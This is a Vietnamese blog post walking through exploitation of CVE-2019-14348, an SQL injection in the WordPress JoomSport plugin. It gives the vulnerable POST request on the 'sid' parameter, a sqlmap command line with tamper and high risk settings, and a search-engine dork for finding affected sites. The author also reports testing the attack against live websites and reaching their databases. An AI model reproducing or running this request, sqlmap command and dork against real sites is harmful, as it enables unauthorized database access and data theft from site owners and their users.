Khai Thác lỗi JoomSport CVE-2019-14348 - MTD SEC

MTD SEC

Chia Sẻ Để Thành Công

Home Top Ad

Post Top Ad

Thứ Năm, 8 tháng 8, 2019

Khai Thác lỗi JoomSport CVE-2019-14348


Ngày hôm nay mình có thấy một cve mới được công bố là CVE-2019-14348 trên wordpress với lỗ hổng sql injection nên cũng thử khai thác xem sao

Theo như trên exploit-db thì lỗi này gặp ở dữ liệu sid trong post của plugin wordpress joomsport có thể chèn và chạy được các câu lệnh sql injection để tấn công website

cụ thể như sau

POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DNT: 1
Connection: close
Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
Upgrade-Insecure-Requests: 1

sid=1&page=1&jscurtab=
Sau một hồi nghiên cứu nó với sqlmap thì mình xây dựng payload như sau

sqlmap -r test.req -p sid --banner --tamper=space2comment --level 5 --risk 3
Kết quả test online một số trang

Như vậy minh có thể cân thiệp được vào database của trang.

dork search vụ này là:

intext:powered by JoomSport - sport WordPress plugin

Không có nhận xét nào:

Đăng nhận xét

Post Top Ad